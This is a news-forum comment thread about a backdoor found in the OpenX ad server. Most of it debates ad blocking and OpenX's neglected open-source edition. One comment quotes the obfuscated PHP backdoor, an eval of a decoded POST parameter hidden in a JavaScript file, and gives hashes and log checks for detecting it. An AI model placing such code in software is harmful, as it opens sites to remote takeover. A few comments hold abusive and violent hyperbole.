Backdoor Found In OpenX Ad Platform

mask.of.sanity writes "A backdoor has existed for at least seven months in a platform sold by OpenX, the self-described global leader of digital advertising which counts the New York Post, Coca Cola, Bloomberg and EA among its customers. The backdoor was contained within the official OpenX package and recently removed. Security researchers say it meant those who downloaded the compromised software could have provided attackers full access to their web sites."

Would you steal a Car?

[Chompjil]

So pretty much Malware ads only with full websites Also EasyList Blocks the Sucuri site

Re:Would you steal a Car?

[xQuarkDS9x]

So pretty much Malware ads only with full websites
Also EasyList Blocks the Sucuri site

And this is why I tell friends and family to run Adblock plus and keep it updated so you have a lot lower chance (if any) to see ads from websites you *believe* are safe delivering malicious code via ads.

Re: Would you steal a Car?

[0123456]

Ha-ha-ha.

At work we have a PC which runs with no ad-blocking. Opening a web site often involves staring at a blank window for thirty seconds or more with a status bar saying something like 'Waiting for ads.bollockx.com'.

If the web wasn't such an ad-infested Swamp Of Suck, people wouldn't be blocking them.

Re: Would you steal a Car?

[Russ1642]

Demonstrating the Heisenberg joke principle. Explaining or measuring the funniness of a joke instantaneously makes in no longer funny. (Also applies to sarcasm)

Re: Would you steal a Car?

Kindly go die in a fire, sir.

Signed: Everyone who's not a moron.

Re:Would you steal a Car?

[KiloByte]

EasyList has a serious flaw: it doesn't add EasyPrivacy by default. Spying servers are nearly as likely to contain extra risks as ad ones.

Re: Would you steal a Car?

[UnknownSoldier]

Quit trolling.

*I* pay for the bandwidth. Ads are stealing from *me* both in time and money.

Re: Would you steal a Car?

Then what are we stealing?

Theft, by definition, means you take the original and the prior owner *no longer* has said item.

Last I checked, not viewing ads on tv or the web doesn't mean I was stealing anything from said companies trying to sell me something.

Re:Would you steal a Car?

[aztracker1]

I use adblock plus and ghostery... though I specifically unblock google ads, and disqus... the rest is pretty much blocked... it's annoying when certain sites won't work with them enabled (I just move on).

Re: Would you steal a Car?

[RabidReindeer]

You must be the kind of person who steals candy from babies too.

Honestly, there is no legitimate reason to run Adblock if you live in an English speaking part of the world. You block, you're a thief. This is not like video interstitials on TV/youtube that waste your time by not being skip able.

The bandwidth argument can only be applied to 2.5G EDGE networks.

The real problem with OPENX is that it's the example that proves the rule that open source doesn't automatically make something better.

I appreciate a good ad. However, I'm no more interested in being assaulted by annoying ads than I am in being accosted by muggers. I don't routinely block, but if they affront me with auto-playing noisy dreck, you can bet I'm going to block them.

And tell your brat to stop crying.

Re: Would you steal a Car?

[Smauler]

Honestly, there is no legitimate reason to run Adblock if you live in an English speaking part of the world. You block, you're a thief.

I don't think I have once clicked on an ad (deliberately) online, in all of my 20 years or so of using the internet. I don't use advertisements as a decent source of information.

I've only recently started using adblock, because I see myself as a thief if I steal all the advertisers bandwidth without ever clicking or buying. They're paying for this exposure.

I generally try to buy from companies that advertise less... when you buy from companies that advertise a lot, you fund the advertisements.

It's good you've equated not looking at adverts to theft.... it makes your argument all the more persuasive.

Re: Would you steal a Car?

[Stan92057]

I already pay for content through higher prices to feed advertising budgets So do i feel bad? No a fucking chance. Get rid of ALL flashing blinking and sound ads and i will get rid of my ad blocker. There is no guarantee a ad network is clean and not serving malware/adware/viruses/spyware so screw you, my computer safety comes first. And i dont need to have what i do on the net to be spied upon just fucking ask me what i would like ya i know its too hard and costs more money boo fucken hooo.

Re: Would you steal a Car?

Off By One Browser with image loading off stops all such delays if you don't mind looking at websites without pictures.

Off By One is a 'dumb' browser that only renders basic HTML (3.2) so there is no problems with Javascript, Java, Flash, or other 'ad friendly' presentation tools.

All the other 'big-name' browsers are in bed with Big Media/Business which is why they are a pain to use in their default configuration. It takes A LOT of work to 'dumb down' a 'real' browser to get it close to working like Off By One and its performance.

CAPTCHA: tonics (How apt! :D Off By One is a refreshing tonic for surfing the ad-clogged series of tubes that is the internet....)

Re: Would you steal a Car?

I generally try to buy from companies that advertise less... when you buy from companies that advertise a lot, you fund the advertisements.

That's why price matters to me when I shop. I am not a '1%er' and DO NOT have money to burn on overpriced, overhyped merchandise!

I just bought an item from THE retail giant today. Across the aisle was an identical product from a different manufacturer for a slightly higher price. I bought the cheaper item.

In the past, I did the same thing with two items that were side by side on the same shelf in another part of the store. The price difference was ridiculously small! I STILL bought the cheaper item!

Pricefixing under the tenuous 'illusion' of 'competition'. :P

Name brands mean NOTHING to me! They do nothing but empty your wallet faster than generics and 'off brands' with the extra cost built in the product to maintain it's 'brand awareness' and whatnot.... :P I'd rather pay for PRODUCT rather than help foot some company's advertising budget. However, at times I am forced to buy the 'name brand' because there are no other convenient alternatives available. :(

With the internet and one's own five senses, push-based mass-media advertising is wasteful and distracting and needs to die out and go away as soon as possible!
This is why Google went from being an online search enginge to being an advertising agency with the world's most popular internet search engine bolted on--pull-based advertising simply works better (for what its worth). Even then, some of the ads I've seen framing my search results from time to time have been desparattely pathetic in the way they are worded to motivate you to click on them. The only way to get ads seen online for sure is to host them yourself from a content-laden website domain that people will visit in droves that cannot be blocked by the HOSTS file as that would 'hide' the site from view. But if you did that, the bandwith expense will bankrupt you! So that leaves third party ads served up by overloaded, underpowered adservers that savvy people already have blocked to speed up their websurfing.

The late Bill Hicks was right: Marketers should stop trying to put a price tag on EVERYTHING in existence! :P
(No, I am not going to quote him properly though I should --the masses have become SO desensitized to advertising, Ads made Bill SO furious, he had to yell and use profanity to get his point across!)

P.S. I find it comically ironic that MAD MEN, a TV drama set in the world of advertising agencies in the 1960s, IS ITSELF SUBSIDIZED BY ADVERTISING IN ORDER TO STAY ON THE AIR!

CAPTCHA: francs (How apt! :D Because the masses are 'mad as hell' at intrusive advertising, they are actively blocking it out as much as possible. Any money spent on push-based advertising is essentially wasted unless you are willing to spends MILLION$!

Even CAPTCHAs are no better than ads unless it is something worthwhile like the reCAPTCHA project: both try to get your attention but you MUST interact with the CAPTCHA to get some desired result--you can ignore the ad if you want.)

Re:Would you steal a Car?

So you are into being mined by an ad company? Ghostery is not what most people think.

Re: Would you steal a Car?

Well, hello, Mr. Murdoch. Guess what? I'm under no obligation whatever, either legally or morally, to watch your ads and I'm certainly under no oblication to allow popups and popunders and slideovers to annoy me. It isn't about bandwidth, it's about pestilence. You people are nothing but pests, and I'd like to see all your offices fumigated with some strong pesticide (say, sarin or similar) with all of you locked inside.

You, sir, are evil incarnate.

Re: Would you steal a Car?

[mattack2]

You're paying for the *bandwidth*. You're not paying for the *content* of the web pages you are going to. They have to pay for their employees, etc. somehow. (I say this as someone who hates ads probably as much as you do.)

Re: Would you steal a Car?

I would steal YOUR car, because you are a moron.
Make me watch an ad, and I will no longer visit your website.
Simple as that.

interestingly, has always been open source

[Trepidity]

OpenX makes an interesting example of a technically open-source project that fails to benefit from open-source much at all. It's GPL'd, but they don't support any kind of public development (no public revision-control systems or anything), and they even make you register to download the source. The page where you do so mostly just tries to convince you not to do so. A third-party site mirrors the open-source version for no-login downloads, but it seems just out of personal interest, since he's the developer of a predecessor to OpenX. It's not clear there is anybody who cares about this codebase or ever looks at it outside the company. Hence, technically open-source, but trying as hard as possible not to be.

Re:interestingly, has always been open source

[Karzz1]

While there are certain hurdles, there certainly is an officially supported revision-control system: https://svn.openx.org/

Having said that, I don't see much there that is newer than the official "community" release.

Re:interestingly, has always been open source

[Banacek]

https://github.com/openx/openx-source

Re:interestingly, has always been open source

[pHalec]

OpenX has been through many twists and turns. I started using it with my employer when it was called phpAdsNew; it then became OpenAds; then OpenX.

It gradually went from a passably supported and FOSS-minded project to a hybrid model, with the FOSS part atrophying very quickly. It became clear to us that this was a liability and we stopped using it. We're now actively avoiding hybrid models like this.

Finding a 7-month-old backdoor vindicates our suspicions.

Re:interestingly, has always been open source

[wimg]

I'm the third party you're talking about, the developer of phpAdsNew. Sadly, things took a turn for the worse when the company OpenAds (now OpenX) decided to make a business out of the advertising server. Although they've made a lot of money, the open source version has been neglected completely.

I put the download page online because I didn't like the fact that you had to register, but I'm haven't been involved in the project since 2002, so there's not much I can do about this shameful bug.

Re:interestingly, has always been open source

Sad indeed. We used phpAdsNew and it was quite amazing, we would have gladly paid for it, then when the switch to OpenAds came about things started feeling very wrong, with a lot more focus on the hosted service then the open source code version. After getting hacked on OpenX we cut our losses and moved on to using something else..

Re:interestingly, has always been open source

OpenX is the perfect example of how to hijack an open-source project and turn it into a venture capital hit-and-run scam.
The open source version has being for years neglected on purpose to push everyone to the pricy enterprise version they offer.
Not surprisingly, the enterprise version has been developed for years now and offers a lot of stuff that is lacking in the open source version.

OpenX calls it 'open source' but it is not anything like most other open source projects. There is no active OpenX use community.
Compared to other solutions the open source version is now a piece of junk, lacking even the most basic features and poorly performing (on purpose).

The open source version has been crippled on purpose.
At my previous we forked the original repository several years ago and were able to scale up the system easily to have it serve several hundred of millions of impressions per months. That was just a matter of a few days of programming.

The goal for OpenX has always been to lure everyone into their enterprise version and it has worked out pretty well for them.
The advertising bubble has not burst yet so there are probably more venture capitalists waiting in line to throw money at this dubious company....

Re:interestingly, has always been open source

[sr180]

Yes - its been exploited to. I admin a site - and we were hit quite hard by this. Im amazed that its taken this long for the exploit to be acknowledged.

what the hell is openX?

and Ad platform can be many things. Specially today with exchanges and what not.

what the hell is openX? their site is as useless to understand this as they seems to shoot in every direction.

I'm guessing it's some ad serving platform that you serve via PHP and that was the compromised portion? to take control of the machines? ...or was there any atempt to infect clients being served by the ads as well?

Re:what the hell is openX?

[DougOtto]

Yes, Openx is a banner ad management and delivery system.

Everything has "Hidden Backdoors" in it...

[dryriver]

... its just a question of how long it takes - how many months or years - for the backdoor's existence to become public knowledge. ---- Once the backdoor is revealed to be there, of course, the whole thing is spun as an "unintentional software/system vulnerability". ---- Nobody ever admits that the backdoor was put where it is very much on purpose, and WITH/FOR a purpose... =) My 2 Cents...

Proof Ads are evil

Long ago, when cavemen used the internet, there were no ads and life was good. Go out of the cave, club something for dinner and enjoy the cave wall display. Then came ads.. They told us to leave the cave and spend on eveything. Let someone else club something, shove it in a package, freeze it and place it in a location where you need to spend more to get a car, gas and so it went.. Ads are evil , see what they did to us ! Oh for the good old days, a simple cave, fire and club is all you needed...

Re:Proof Ads are evil

[Noughmad]

I'll take ads I can block over Geocities websites with five fonts, eight colors and blink tags.

Another reason to hate web2.0'horrea

[al0ha]

Cross domain advertising JavaScript is sooooo lame, it's required the removal of basic security implemented way back in browsers and opened the door to all kinds of miscreant behavior. I despise the Internet as a vehicle of advertising commerce.

The Internet was conceived to share ideas and information, everything else is utter BS in the name of money grubbing.

Re:Another reason to hate web2.0'horrea

[aztracker1]

I happen to prefer web-based applications to desktop apps (for most use cases)... this is essential to JS etc... Public facing web-apps are generally very useful as well... the problem is those that subvert the use... When I saw the first popover X-10 camera advertisement, I knew it was down hill from there.

why are they even interpreting .js files?!?!

If they run .js files trhu php parser they ought to loose control of their servers. It will be in better hands anyway.

APK. APK! APmmmpph!

Quit trolling.

If only someone would be kind enough to explain how this festering morass of ads, malware and miasma could be avoided by the use of a simple blacklist.

Probably just an accident (snicker)

[hyades1]

"Security researchers say it meant those who downloaded the compromised software could have provided attackers full access to their web sites."

"Security researchers say it meant those who downloaded the compromised software undoubtedly provided attackers full access to their web sites."

There...fixed that for you.

Fixed in openx 2.8.11

[millisa]

It is fixed in 2.8.11
http://forum.openx.org/index.php?showtopic=503521628 has openx's response.

Quick check on your servers by going to the openx base directory and doing an md5:
md5sum \
    plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js \
    plugins/deliveryLog/vastServeVideoPlayer/player.delivery.php \
    lib/max/Delivery/common.php

These md5's match the problem files:
558c80e601fb996e5f6bbc99a9ee0051 plugins/deliveryLog/vastServeVideoPlayer/flowplayer/3.1.1/flowplayer-3.1.1.min.js
fa4991d5fd3bf4a947b6ab0b15ce10b2 plugins/deliveryLog/vastServeVideoPlayer/player.delivery.php
5014c31b479094c0b32221ae1f1473ac lib/max/Delivery/common.php

flowplayer-3.1.1.min.js is the important one.
It has
$j='explode';
$_=$j(',','strrev,str_rot13,vastPlayer');
eval($_[1]($_[0]($_POST[$_[2]])));

obfuscated in it.

The flowerplayer-3.1.1min.js file shouldn't have changed since 2.8.9. So if you have an older version, you can just drop that into place over top of the one you currently have (just make sure it doesn't have the php tag in it). My unexploited copy from the last version was dated 7-17-2012 and has the following md5
8570c9bbdd01bef2c812270e68a306b5 flowplayer-3.1.1.min.js

The update is here or if you log in to your openx administrator panel, it should show by switching to the 'Administrator' in the upper right dropdown, going to 'configuration' and to the 'product updates' section in the left hand bar.

Finding out if someone actually used it on your server would require grepping through your logs for a post to fc.php and flow player-3.1.1.min.js. (I didn't see any requests for it on my servers, so I'm guessing there's not an automated scanner for it yet).

Ad blocking

[pe1chl]

I had already blocked all ads served by openx servers (by URL regexp) long before this, after a couple of bad happenings on ad sites running openx.
It apparently is an unreliable platform. This finding only proves that.
However, I also think the ad platforms should make 5 steps back to become credible and acceptable again.
An ad server should be called from some customer-specific URL on the website and then serve a JPG or PNG with the ad. Period.
All the hoopla with javascripts fetched from different places, iframes, active content (like flash) etc has made it into an unreliable
piece of junk that just asks for being blocked. When I block it, they should not blame me but blame themselves.

Anyone wonder WHY I built this then?

I avoid ads totally (especially malscripted ones) via hosts files - how do I gather, sort, deduplicate, normalize, & filter them? Easy:

---

APK Hosts File Engine 9.0++ 32/64-bit:

http://start64.com/index.php?option=com_content&view=article&id=5851:apk-hosts-file-engine-64bit-version&catid=26:64bit-security-software&Itemid=74

---

Using that app by "yours truly"? So can you!

Hosts files do more with less (a single file) & at a faster level of privelege (ring 0/rpl0/kernelmode) than browser addons (that slow up already slower ring 3/rpl 3/usermode browsers) by acting as a filter for the IP stack itself (written in C language & starts with the OS + 1st request to the internet it is the 1st resolver queried as well, with over 45++ yrs.of optimization refinement put into it).

* It also does FAR more than AdBlock ("souled-out" to GOOGLE, & crippled by default) or Ghostery (Advertiser owned) do, by FAR - especially considering they're "Foxes guarding the henhouse" now.

Hosts also gain you reliability vs. downed DNS servers & protect you vs redirected DNS servers as well as securing you vs. known malicious sites/servers/hosts-domains online http://tech.slashdot.org/comments.pl?sid=3985079&cid=44310431 and with far less added "moving parts" room for breakdown, less complexity, and "less is more".

APK

P.S.=> Custom hosts files give users of them great benefits in added speed (blocking adbanners & hardcoding your favorite sites into them - faster than remote DNS lookups), added security (vs. known malicious sites/serves/hosts-domains that serve up malware or are malscript bearing - blocking spam/phish malicious links also), added reliability (vs. Kaminsky bug vulnerable DNS servers, 99% of which are STILL unpatched vs. it & worst of all @ the ISP level + vulnerable as hell vs. FastFlux + Dynamic DNS using botnets), & even added anonymity to an extent (vs. dns request logs + DNSBL's you may not like too)...

... apk

Customer/user is always right

Ads suck up bandwidth we pay for. Content's pointless minus customers/users consuming it, & the customer is always right. In fact, so right, you can't do without them. You're not operating from a position of strength here, get over it.